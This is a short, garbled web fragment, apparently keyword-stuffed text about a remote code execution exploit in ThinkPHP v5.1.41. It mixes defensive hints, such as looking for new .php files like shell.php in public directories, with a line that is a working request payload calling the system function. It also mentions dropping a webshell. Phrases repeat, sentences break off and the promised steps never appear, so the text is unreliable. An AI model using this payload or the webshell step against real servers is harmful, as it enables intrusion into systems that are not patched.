Creates a file named shell.php with a simple webshell.
Check for new .php files in public directories (often named 1.php , shell.php , or random strings). thinkphp v5.1.41 exploit
A typical payload for this class of exploit looks like this: Creates a file named shell
If you are running a legacy system on ThinkPHP v5.1.41, the following steps are critical: thinkphp v5.1.41 exploit
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id